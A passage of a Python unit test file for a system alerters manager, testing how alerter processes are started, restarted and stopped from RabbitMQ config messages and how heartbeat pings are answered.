@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(RabbitMQApi, "basic_ack")
@mock.patch.object(multiprocessing.Process, "start")
@mock.patch.object(multiprocessing.Process, "terminate")
@mock.patch.object(multiprocessing.Process, "join")
def test_process_configs_stores_modified_configs_to_be_alerted_on_correctly(
self, mock_join, mock_terminate, mock_start, mock_ack,
mock_push_and_send, mock_system_alerts_config) -> None:
mock_ack.return_value = None
mock_start.return_value = None
mock_join.return_value = None
mock_terminate.return_value = None
mock_push_and_send.return_value = None
try:
# Must create a connection so that the blocking channel is passed
self.test_manager.rabbitmq.connect()
blocking_channel = self.test_manager.rabbitmq.channel
# We will send new configs through both the existing and
# non-existing chain and general paths to make sure that all routes
# work as expected.
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_chain_initial = json.dumps(
self.sent_configs_example_with_default)
body_general_initial = json.dumps(
self.sent_configs_example_with_default_2)
properties = pika.spec.BasicProperties()
self.test_manager._process_configs(blocking_channel, method_chains,
properties, body_chain_initial)
mock_join.assert_not_called()
mock_terminate.assert_not_called()
self.test_manager._process_configs(blocking_channel, method_general,
properties, body_general_initial)
mock_join.assert_not_called()
mock_terminate.assert_not_called()
self.open_file_descriptors['enabled'] = str(
not bool(self.enabled_alert))
self.open_file_descriptors_2['enabled'] = str(
not bool(self.enabled_alert))
self.sent_configs_example_with_default[
'1'] = self.open_file_descriptors
self.sent_configs_example_with_default_2[
'1'] = self.open_file_descriptors_2
body_new_configs_chain = json.dumps(
self.sent_configs_example_with_default)
body_new_configs_general = json.dumps(
self.sent_configs_example_with_default_2)
self.test_manager._process_configs(blocking_channel, method_chains,
properties,
body_new_configs_chain)
self.assertEqual(1, mock_join.call_count)
self.assertEqual(1, mock_terminate.call_count)
self.test_manager._process_configs(blocking_channel, method_general,
properties,
body_new_configs_general)
self.assertEqual(2, mock_join.call_count)
self.assertEqual(2, mock_terminate.call_count)
self.assertTrue(
self.parent_id_1 in self.test_manager.parent_id_process_dict)
self.assertTrue(
self.parent_id_2 in self.test_manager.parent_id_process_dict)
self.assertEqual(4, mock_system_alerts_config.call_count)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch("src.alerter.managers.system.SystemAlertsConfig")
@mock.patch.object(RabbitMQApi, "basic_ack")
@mock.patch.object(SystemAlertersManager,
"_create_and_start_alerter_process")
def test_proc_configs_starts_new_alerters_for_new_configs_to_be_alerted_on(
self, startup_mock, mock_ack, mock_system_alerters_config,
mock_push_and_send) -> None:
mock_system_alerters_config_1 = mock_system_alerters_config(
parent_id=self.parent_id_1,
open_file_descriptors=self.open_file_descriptors,
system_cpu_usage=self.system_cpu_usage,
system_storage_usage=self.system_storage_usage,
system_ram_usage=self.system_ram_usage,
system_is_down=self.system_is_down)
mock_system_alerters_config_2 = mock_system_alerters_config(
parent_id=self.parent_id_2,
open_file_descriptors=self.open_file_descriptors_2,
system_cpu_usage=self.system_cpu_usage_2,
system_storage_usage=self.system_storage_usage_2,
system_ram_usage=self.system_ram_usage_2,
system_is_down=self.system_is_down_2)
mock_ack.return_value = None
startup_mock.return_value = None
mock_push_and_send.return_value = None
try:
# Must create a connection so that the blocking channel is passed
self.test_manager.rabbitmq.connect()
blocking_channel = self.test_manager.rabbitmq.channel
# We will send new configs through both the existing and
# non-existing chain and general paths to make sure that all routes
# work as expected.
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_chain_initial = json.dumps(
self.sent_configs_example_with_default)
body_general_initial = json.dumps(
self.sent_configs_example_with_default_2)
properties = pika.spec.BasicProperties()
self.test_manager._process_configs(blocking_channel, method_chains,
properties, body_chain_initial)
self.assertEqual(1, startup_mock.call_count)
startup_mock.assert_called_once_with(
mock_system_alerters_config_1, self.parent_id_1,
self.chain_1
)
self.test_manager._process_configs(blocking_channel, method_general,
properties,
body_general_initial)
self.assertEqual(2, startup_mock.call_count)
startup_mock.assert_called_with(
mock_system_alerters_config_2, self.parent_id_2,
self.chain_2
)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch("src.alerter.alerter_starters.create_logger")
@mock.patch.object(RabbitMQApi, "basic_ack")
def test_proc_confs_term_and_starts_alerters_for_modified_confs_to_be_alerted_on(
self, mock_ack, mock_create_logger, mock_push_and_send) -> None:
mock_ack.return_value = None
mock_create_logger.return_value = self.dummy_logger
mock_push_and_send.return_value = None
try:
# Must create a connection so that the blocking channel is passed
self.test_manager.rabbitmq.connect()
blocking_channel = self.test_manager.rabbitmq.channel
# We will send new configs through both the existing and
# non-existing chain and general paths to make sure that all routes
# work as expected.
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_chain_initial = json.dumps(
self.sent_configs_example_with_default)
body_general_initial = json.dumps(
self.sent_configs_example_with_default_2)
properties = pika.spec.BasicProperties()
# First send the new configs as the state is empty
self.test_manager._process_configs(blocking_channel, method_chains,
properties, body_chain_initial)
self.test_manager._process_configs(blocking_channel, method_general,
properties, body_general_initial)
# Assure that the processes have been started
self.assertTrue(self.test_manager.parent_id_process_dict[
self.parent_id_1]['process'].is_alive())
self.assertTrue(self.test_manager.parent_id_process_dict[
self.parent_id_2]['process'].is_alive())
# Give some time till the process starts
time.sleep(1)
parent_id_1_old_proc = self.test_manager.parent_id_process_dict[
self.parent_id_1]['process']
parent_id_2_old_proc = self.test_manager.parent_id_process_dict[
self.parent_id_2]['process']
self.open_file_descriptors['enabled'] = str(
not bool(self.enabled_alert))
self.open_file_descriptors_2['enabled'] = str(
not bool(self.enabled_alert))
self.sent_configs_example_with_default[
'1'] = self.open_file_descriptors
self.sent_configs_example_with_default_2[
'1'] = self.open_file_descriptors_2
body_new_configs_chain = json.dumps(
self.sent_configs_example_with_default)
body_new_configs_general = json.dumps(
self.sent_configs_example_with_default_2)
self.test_manager._process_configs(blocking_channel, method_chains,
properties,
body_new_configs_chain)
self.test_manager._process_configs(blocking_channel, method_general,
properties,
body_new_configs_general)
# Give some time till the process re-starts
time.sleep(1)
# Check that the old process has terminated and a new one has
# started.
self.assertFalse(parent_id_1_old_proc.is_alive())
self.assertTrue(self.test_manager.parent_id_process_dict[
self.parent_id_1]['process'].is_alive())
self.assertFalse(parent_id_2_old_proc.is_alive())
self.assertTrue(self.test_manager.parent_id_process_dict[
self.parent_id_2]['process'].is_alive())
# Clean before finishing
self.test_manager.parent_id_process_dict[self.parent_id_1][
'process'].terminate()
self.test_manager.parent_id_process_dict[self.parent_id_1][
'process'].join()
self.test_manager.parent_id_process_dict[self.parent_id_2][
'process'].terminate()
self.test_manager.parent_id_process_dict[self.parent_id_2][
'process'].join()
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch("src.alerter.alerter_starters.create_logger")
@mock.patch.object(RabbitMQApi, "basic_ack")
def test_proc_configs_term_and_stops_alerters_for_removed_configs(
self, mock_ack, mock_create_logger, mock_push_and_send) -> None:
mock_ack.return_value = None
mock_push_and_send.return_value = None
mock_create_logger.return_value = self.dummy_logger
try:
# Must create a connection so that the blocking channel is passed
self.test_manager.rabbitmq.connect()
blocking_channel = self.test_manager.rabbitmq.channel
# We will send new configs through both the existing and
# non-existing chain and general paths to make sure that all routes
# work as expected.
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_chain_initial = json.dumps(
self.sent_configs_example_with_default)
body_general_initial = json.dumps(
self.sent_configs_example_with_default_2)
properties = pika.spec.BasicProperties()
# First send the new configs as the state is empty
self.test_manager._process_configs(blocking_channel, method_chains,
properties, body_chain_initial)
self.test_manager._process_configs(blocking_channel, method_general,
properties, body_general_initial)
# Assure that the processes have been started
self.assertTrue(self.test_manager.parent_id_process_dict[
self.parent_id_1]['process'].is_alive())
self.assertTrue(self.test_manager.parent_id_process_dict[
self.parent_id_2]['process'].is_alive())
# Give some time till the process starts
time.sleep(1)
parent_id_1_old_proc = self.test_manager.parent_id_process_dict[
self.parent_id_1]['process']
parent_id_2_old_proc = self.test_manager.parent_id_process_dict[
self.parent_id_2]['process']
body_new_configs_chain = json.dumps(self.empty_message)
body_new_configs_general = json.dumps(self.empty_message)
self.test_manager._process_configs(blocking_channel, method_chains,
properties,
body_new_configs_chain)
self.test_manager._process_configs(blocking_channel, method_general,
properties,
body_new_configs_general)
# Give some time till the process re-starts
time.sleep(1)
# Check that the old process has terminated and a new one has
# started.
self.assertFalse(parent_id_1_old_proc.is_alive())
self.assertFalse(parent_id_2_old_proc.is_alive())
self.assertFalse(
self.parent_id_1 in self.test_manager.parent_id_process_dict)
self.assertFalse(
self.parent_id_1 in self.test_manager.systems_alerts_configs)
self.assertFalse(
self.parent_id_2 in self.test_manager.parent_id_process_dict)
self.assertFalse(
self.parent_id_2 in self.test_manager.systems_alerts_configs)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch("src.alerter.managers.system.SystemAlertsConfig")
@mock.patch.object(RabbitMQApi, "basic_ack")
@mock.patch.object(SystemAlertersManager,
"_create_and_start_alerter_process")
@mock.patch.object(multiprocessing.Process, "join")
@mock.patch.object(multiprocessing.Process, "terminate")
def test_process_confs_restarts_an_updated_alerter_with_the_correct_conf(
self, mock_terminate, mock_join, startup_mock, mock_ack,
mock_system_alerters_config) -> None:
mock_ack.return_value = None
startup_mock.return_value = None
mock_join.return_value = None
mock_terminate.return_value = None
self.test_manager._systems_alerts_configs[self.parent_id_1] = \
self.system_alerts_config
self.test_manager._systems_alerts_configs[self.parent_id_2] = \
self.system_alerts_config_2
self.test_manager._parent_id_process_dict = \
self.config_process_dict_example
try:
# Must create a connection so that the blocking channel is passed
self.test_manager.rabbitmq.connect()
blocking_channel = self.test_manager.rabbitmq.channel
# We will send new configs through both the existing and
# non-existing chain and general paths to make sure that all routes
# work as expected.
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
self.open_file_descriptors['enabled'] = str(
not bool(self.enabled_alert))
self.open_file_descriptors_2['enabled'] = str(
not bool(self.enabled_alert))
self.sent_configs_example_with_default[
'1'] = self.open_file_descriptors
self.sent_configs_example_with_default_2[
'1'] = self.open_file_descriptors_2
mock_system_alerters_config_1 = mock_system_alerters_config(
parent_id=self.parent_id_1,
open_file_descriptors=self.open_file_descriptors,
system_cpu_usage=self.system_cpu_usage,
system_storage_usage=self.system_storage_usage,
system_ram_usage=self.system_ram_usage,
system_is_down=self.system_is_down)
mock_system_alerters_config_2 = mock_system_alerters_config(
parent_id=self.parent_id_2,
open_file_descriptors=self.open_file_descriptors_2,
system_cpu_usage=self.system_cpu_usage_2,
system_storage_usage=self.system_storage_usage_2,
system_ram_usage=self.system_ram_usage_2,
system_is_down=self.system_is_down_2)
body_updated_configs_chain = json.dumps(
self.sent_configs_example_with_default)
body_updated_configs_general = json.dumps(
self.sent_configs_example_with_default_2)
properties = pika.spec.BasicProperties()
self.test_manager._process_configs(blocking_channel, method_chains,
properties,
body_updated_configs_chain)
startup_mock.assert_called_with(
mock_system_alerters_config_1, self.parent_id_1,
self.chain_1
)
self.test_manager._process_configs(blocking_channel, method_general,
properties,
body_updated_configs_general)
startup_mock.assert_called_with(
mock_system_alerters_config_2, self.parent_id_2,
self.chain_2
)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(RabbitMQApi, "basic_ack")
def test_process_configs_ignores_new_configs_with_missing_keys(
self, mock_ack, mock_push_and_send) -> None:
# We will check whether the state is kept intact if new configurations
# with missing keys are sent. Exceptions should never be raised in this
# case, and basic_ack must be called to ignore the message.
mock_ack.return_value = None
mock_push_and_send.return_value = None
try:
# Must create a connection so that the blocking channel is passed
self.test_manager.rabbitmq.connect()
blocking_channel = self.test_manager.rabbitmq.channel
# We will send new configs through both the existing and
# non-existing chain and general paths to make sure that all routes
# work as expected.
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_new_configs_general = json.dumps(
self.sent_configs_example_with_default_2)
body_new_configs_chain_missing = json.dumps(
self.sent_configs_example_with_missing_keys)
properties = pika.spec.BasicProperties()
# This should start a process as normal
self.test_manager._process_configs(blocking_channel, method_general,
properties,
body_new_configs_general)
self.assertEqual(1, mock_ack.call_count)
self.assertTrue(
self.parent_id_2 in self.test_manager.systems_alerts_configs)
# This should fail to start a process as there are missing keys
self.test_manager._process_configs(blocking_channel, method_chains,
properties,
body_new_configs_chain_missing)
self.assertEqual(2, mock_ack.call_count)
self.assertFalse(
self.parent_id_1 in self.test_manager.systems_alerts_configs)
self.test_manager._terminate_and_join_chain_alerter_processes(
self.parent_id_2)
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(RabbitMQApi, "basic_ack")
def test_process_configs_ignores_modified_configs_with_missing_keys(
self, mock_ack, mock_push_and_send) -> None:
# We will check whether the state is kept intact if modified
# configurations with missing keys are sent. Exceptions should never be
# raised in this case, and basic_ack must be called to ignore the
# message.
mock_ack.return_value = None
mock_push_and_send.return_value = None
self.test_manager._systems_alerts_configs[self.parent_id_1] = \
self.system_alerts_config
self.test_manager._systems_alerts_configs[self.parent_id_2] = \
self.system_alerts_config_2
self.test_manager._parent_id_process_dict = \
self.config_process_dict_example
try:
# Must create a connection so that the blocking channel is passed
self.test_manager.rabbitmq.connect()
blocking_channel = self.test_manager.rabbitmq.channel
# We will send new configs through both the existing and
# non-existing chain and general paths to make sure that all routes
# work as expected.
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_updated_configs_chain = json.dumps(
self.sent_configs_example_with_missing_keys)
body_updated_configs_general = json.dumps(
self.sent_configs_example_with_default_2_missing_keys)
properties = pika.spec.BasicProperties()
self.test_manager._process_configs(blocking_channel, method_general,
properties,
body_updated_configs_general)
self.assertEqual(1, mock_ack.call_count)
self.assertEqual(self.config_process_dict_example,
self.test_manager.parent_id_process_dict)
self.assertEqual(self.system_alerts_config,
self.test_manager.systems_alerts_configs[
self.parent_id_1])
self.test_manager._process_configs(blocking_channel, method_chains,
properties,
body_updated_configs_chain)
self.assertEqual(2, mock_ack.call_count)
self.assertEqual(self.config_process_dict_example,
self.test_manager.parent_id_process_dict)
self.assertEqual(self.system_alerts_config_2,
self.test_manager.systems_alerts_configs[
self.parent_id_2])
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(RabbitMQApi, "basic_nack")
@mock.patch.object(RabbitMQApi, "basic_ack")
def test_process_configs_ignores_confs_if_ComponentResetAlert_fails(
self, mock_ack, mock_nack, mock_push_and_send) -> None:
# We will check whether the state is kept intact if a
# ComponentResetAlert fails in being delivered. Exceptions should never
# be raised in this case, and basic_nack must be called so the message
# is re-delivered.
mock_nack.return_value = None
mock_ack.return_value = None
mock_push_and_send.side_effect = [
None, MessageWasNotDeliveredException('test')
]
try:
# Must create a connection so that the blocking channel is passed
self.test_manager.rabbitmq.connect()
blocking_channel = self.test_manager.rabbitmq.channel
# We will send new configs through both the existing and
# non-existing chain and general paths to make sure that all routes
# work as expected.
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_new_configs_general = json.dumps(
self.sent_configs_example_with_default_2)
body_new_configs_chain = json.dumps(
self.sent_configs_example_with_default)
properties = pika.spec.BasicProperties()
# This should start a process as normal
self.test_manager._process_configs(blocking_channel, method_general,
properties,
body_new_configs_general)
self.assertEqual(1, mock_ack.call_count)
self.assertTrue(
self.parent_id_2 in self.test_manager.systems_alerts_configs)
# This should fail to start a process as we will automate a
# MessageWasNotDeliveredException
self.test_manager._process_configs(blocking_channel, method_chains,
properties,
body_new_configs_chain)
self.assertEqual(1, mock_ack.call_count)
self.assertFalse(
self.parent_id_1 in self.test_manager.systems_alerts_configs)
self.assertEqual(1, mock_nack.call_count)
self.test_manager._terminate_and_join_chain_alerter_processes(
self.parent_id_2)
except Exception as e:
self.fail("Test failed: {}".format(e))
@freeze_time("2012-01-01")
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(RabbitMQApi, "basic_ack")
@mock.patch.object(multiprocessing.Process, "is_alive")
@mock.patch.object(multiprocessing.Process, "start")
@mock.patch.object(multiprocessing.Process, "join")
@mock.patch.object(multiprocessing.Process, "terminate")
def test_process_ping_sends_a_valid_hb_if_all_processes_are_alive(
self, mock_terminate, mock_join, mock_start, mock_is_alive,
mock_ack, mock_push_and_send) -> None:
# This test creates a queue which receives messages with the same
# routing key as the ones sent by send_heartbeat, and checks that the
# received heartbeat is valid.
mock_ack.return_value = None
mock_is_alive.side_effect = [True, True]
mock_start.return_value = None
mock_join.return_value = None
mock_terminate.return_value = None
mock_push_and_send.return_value = None
try:
self.test_manager._initialise_rabbitmq()
blocking_channel = self.test_manager.rabbitmq.channel
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_chain_initial = json.dumps(
self.sent_configs_example_with_default)
body_general_initial = json.dumps(
self.sent_configs_example_with_default_2)
properties = pika.spec.BasicProperties()
# First send the new configs as the state is empty
self.test_manager._process_configs(blocking_channel, method_chains,
properties, body_chain_initial)
self.test_manager._process_configs(blocking_channel, method_general,
properties, body_general_initial)
# Delete the queue before to avoid messages in the queue on error.
self.test_manager.rabbitmq.queue_delete(self.test_queue_name)
# initialise
method_hb = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
body = 'ping'
res = self.test_manager.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_manager.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
self.test_manager._process_ping(blocking_channel, method_hb,
properties, body)
# By re-declaring the queue again we can get the number of messages
# in the queue.
res = self.test_manager.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
self.assertEqual(1, res.method.message_count)
# Check that the message received is a valid HB
_, _, body = self.test_manager.rabbitmq.basic_get(
self.test_queue_name)
expected_output = {
'component_name': self.test_manager.name,
'running_processes':
[self.test_manager.parent_id_process_dict[self.parent_id_1][
'component_name'],
self.test_manager.parent_id_process_dict[self.parent_id_2][
'component_name']],
'dead_processes': [],
'timestamp': datetime(2012, 1, 1).timestamp(),
}
self.assertEqual(expected_output, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
@freeze_time("2012-01-01")
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(RabbitMQApi, "basic_ack")
@mock.patch.object(multiprocessing.Process, "is_alive")
@mock.patch.object(multiprocessing.Process, "start")
@mock.patch.object(multiprocessing.Process, "join")
@mock.patch.object(multiprocessing.Process, "terminate")
def test_process_ping_sends_a_valid_hb_if_some_processes_alive_some_dead(
self, mock_terminate, mock_join, mock_start, mock_is_alive,
mock_ack, mock_push_and_send) -> None:
# This test creates a queue which receives messages with the same
# routing key as the ones sent by send_heartbeat, and checks that the
# received heartbeat is valid.
mock_ack.return_value = None
mock_is_alive.side_effect = [True, False]
mock_start.return_value = None
mock_join.return_value = None
mock_terminate.return_value = None
mock_push_and_send.return_value = None
try:
self.test_manager._initialise_rabbitmq()
blocking_channel = self.test_manager.rabbitmq.channel
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_chain_initial = json.dumps(
self.sent_configs_example_with_default)
body_general_initial = json.dumps(
self.sent_configs_example_with_default_2)
properties = pika.spec.BasicProperties()
# First send the new configs as the state is empty
self.test_manager._process_configs(blocking_channel, method_chains,
properties, body_chain_initial)
self.test_manager._process_configs(blocking_channel, method_general,
properties, body_general_initial)
# Delete the queue before to avoid messages in the queue on error.
self.test_manager.rabbitmq.queue_delete(self.test_queue_name)
# initialise
method_hb = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
body = 'ping'
res = self.test_manager.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_manager.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
self.test_manager._process_ping(blocking_channel, method_hb,
properties, body)
# By re-declaring the queue again we can get the number of messages
# in the queue.
res = self.test_manager.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
self.assertEqual(1, res.method.message_count)
# Check that the message received is a valid HB
_, _, body = self.test_manager.rabbitmq.basic_get(
self.test_queue_name)
expected_output = {
'component_name': self.test_manager.name,
'running_processes':
[self.test_manager.parent_id_process_dict[self.parent_id_1][
'component_name']],
'dead_processes': [self.test_manager.parent_id_process_dict[
self.parent_id_2]['component_name']],
'timestamp': datetime(2012, 1, 1).timestamp(),
}
self.assertEqual(expected_output, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
@freeze_time("2012-01-01")
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(RabbitMQApi, "basic_ack")
@mock.patch.object(multiprocessing.Process, "is_alive")
@mock.patch.object(multiprocessing.Process, "start")
@mock.patch.object(multiprocessing.Process, "join")
@mock.patch.object(multiprocessing.Process, "terminate")
def test_process_ping_sends_a_valid_hb_if_all_processes_dead(
self, mock_terminate, mock_join, mock_start, mock_is_alive,
mock_ack, mock_push_and_send) -> None:
# This test creates a queue which receives messages with the same
# routing key as the ones sent by send_heartbeat, and checks that the
# received heartbeat is valid.
mock_ack.return_value = None
mock_is_alive.side_effect = [False, False]
mock_start.return_value = None
mock_join.return_value = None
mock_terminate.return_value = None
mock_push_and_send.return_value = None
try:
self.test_manager._initialise_rabbitmq()
blocking_channel = self.test_manager.rabbitmq.channel
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_chain_initial = json.dumps(
self.sent_configs_example_with_default)
body_general_initial = json.dumps(
self.sent_configs_example_with_default_2)
properties = pika.spec.BasicProperties()
# First send the new configs as the state is empty
self.test_manager._process_configs(blocking_channel, method_chains,
properties, body_chain_initial)
self.test_manager._process_configs(blocking_channel, method_general,
properties, body_general_initial)
# Delete the queue before to avoid messages in the queue on error.
self.test_manager.rabbitmq.queue_delete(self.test_queue_name)
# initialise
method_hb = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
body = 'ping'
res = self.test_manager.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=False
)
self.assertEqual(0, res.method.message_count)
self.test_manager.rabbitmq.queue_bind(
queue=self.test_queue_name, exchange=HEALTH_CHECK_EXCHANGE,
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
self.test_manager._process_ping(blocking_channel, method_hb,
properties, body)
# By re-declaring the queue again we can get the number of messages
# in the queue.
res = self.test_manager.rabbitmq.queue_declare(
queue=self.test_queue_name, durable=True, exclusive=False,
auto_delete=False, passive=True
)
self.assertEqual(1, res.method.message_count)
# Check that the message received is a valid HB
_, _, body = self.test_manager.rabbitmq.basic_get(
self.test_queue_name)
expected_output = {
'component_name': self.test_manager.name,
'running_processes': [],
'dead_processes':
[self.test_manager.parent_id_process_dict[self.parent_id_1][
'component_name'],
self.test_manager.parent_id_process_dict[self.parent_id_2][
'component_name']],
'timestamp': datetime(2012, 1, 1).timestamp(),
}
self.assertEqual(expected_output, json.loads(body))
except Exception as e:
self.fail("Test failed: {}".format(e))
@freeze_time("2012-01-01")
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(RabbitMQApi, "basic_ack")
@mock.patch("src.alerter.alerter_starters.create_logger")
@mock.patch.object(SystemAlertersManager, "_send_heartbeat")
def test_process_ping_restarts_dead_processes(
self, send_hb_mock, mock_create_logger, mock_ack,
mock_push_and_send) -> None:
send_hb_mock.return_value = None
mock_create_logger.return_value = self.dummy_logger
mock_ack.return_value = None
mock_push_and_send.return_value = None
try:
self.test_manager.rabbitmq.connect()
blocking_channel = self.test_manager.rabbitmq.channel
method_chains = pika.spec.Basic.Deliver(
routing_key=self.chains_routing_key)
method_general = pika.spec.Basic.Deliver(
routing_key=self.general_routing_key)
body_chain_initial = json.dumps(
self.sent_configs_example_with_default)
body_general_initial = json.dumps(
self.sent_configs_example_with_default_2)
properties = pika.spec.BasicProperties()
# First send the new configs as the state is empty
self.test_manager._process_configs(blocking_channel, method_chains,
properties, body_chain_initial)
self.test_manager._process_configs(blocking_channel, method_general,
properties, body_general_initial)
# Give time for the processes to start
time.sleep(1)
# Automate the case when having all processes dead
self.test_manager.parent_id_process_dict[self.parent_id_1][
'process'].terminate()
self.test_manager.parent_id_process_dict[self.parent_id_1][
'process'].join()
self.test_manager.parent_id_process_dict[self.parent_id_2][
'process'].terminate()
self.test_manager.parent_id_process_dict[self.parent_id_2][
'process'].join()
# Give time for the processes to terminate
time.sleep(1)
# Check that that the processes have terminated
self.assertFalse(self.test_manager.parent_id_process_dict[
self.parent_id_1]['process'].is_alive())
self.assertFalse(self.test_manager.parent_id_process_dict[
self.parent_id_2]['process'].is_alive())
# initialise
method_hb = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
body = 'ping'
self.test_manager._process_ping(blocking_channel, method_hb,
properties, body)
# Give time for the processes to start
time.sleep(1)
self.assertTrue(
self.test_manager.parent_id_process_dict[self.parent_id_1][
'process'].is_alive())
self.assertTrue(
self.test_manager.parent_id_process_dict[self.parent_id_2][
'process'].is_alive())
# Clean before test finishes
self.test_manager.parent_id_process_dict[self.parent_id_1][
'process'].terminate()
self.test_manager.parent_id_process_dict[self.parent_id_1][
'process'].join()
self.test_manager.parent_id_process_dict[self.parent_id_2][
'process'].terminate()
self.test_manager.parent_id_process_dict[self.parent_id_2][
'process'].join()
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(SystemAlertersManager,
"_push_latest_data_to_queue_and_send")
@mock.patch.object(SystemAlertersManager, "_send_heartbeat")
@mock.patch.object(SystemAlertersManager,
"_create_and_start_alerter_process")
@mock.patch.object(multiprocessing.Process, "join")
@mock.patch.object(multiprocessing.Process, "is_alive")
def test_process_ping_restarts_dead_processes_with_correct_info(
self, mock_alive, mock_join, startup_mock, send_hb_mock,
mock_push_and_send) -> None:
send_hb_mock.return_value = None
startup_mock.return_value = None
mock_alive.return_value = False
mock_join.return_value = None
mock_push_and_send.return_value = None
try:
self.test_manager.rabbitmq.connect()
self.test_manager._systems_alerts_configs[self.parent_id_1] = \
self.system_alerts_config
self.test_manager._systems_alerts_configs[self.parent_id_2] = \
self.system_alerts_config_2
self.test_manager._parent_id_process_dict = \
self.config_process_dict_example
# initialise
blocking_channel = self.test_manager.rabbitmq.channel
method = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
properties = pika.spec.BasicProperties()
body = 'ping'
self.test_manager._process_ping(blocking_channel, method,
properties, body)
self.assertEqual(2, startup_mock.call_count)
call_1 = call(
self.test_manager.systems_alerts_configs[self.parent_id_1],
self.parent_id_1, self.chain_1)
call_2 = call(
self.test_manager.systems_alerts_configs[self.parent_id_2],
self.parent_id_2, self.chain_2)
startup_mock.assert_has_calls([call_1, call_2])
except Exception as e:
self.fail("Test failed: {}".format(e))
@mock.patch.object(multiprocessing.Process, "is_alive")
@mock.patch.object(multiprocessing.Process, "start")
@mock.patch.object(multiprocessing, 'Process')
def test_process_ping_does_not_send_hb_if_processing_fails(
self, mock_process, mock_start, is_alive_mock) -> None:
# This test creates a queue which receives messages with the same
# routing key as the ones sent by send_heartbeat. In this test we will
# check that no heartbeat is sent when mocking a raised exception.
is_alive_mock.side_effect = self.test_exception
mock_start.return_value = None
mock_process.side_effect = self.dummy_process1
try:
self.test_manager._initialise_rabbitmq()
# Delete the queue before to avoid messages in the queue on error.
self.test_manager.rabbitmq.queue_delete(self.test_queue_name)
self.test_manager._systems_alerts_configs[self.parent_id_1] = \
self.system_alerts_config
self.test_manager._systems_alerts_configs[self.parent_id_2] = \
self.system_alerts_config_2
self.test_manager._parent_id_process_dict = \
self.config_process_dict_example
# initialise
blocking_channel = self.test_manager.rabbitmq.channel
method = pika.spec.Basic.Deliver(
routing_key=HEARTBEAT_OUTPUT_MANAGER_ROUTING_KEY)
properties = pika.spec.BasicProperties()
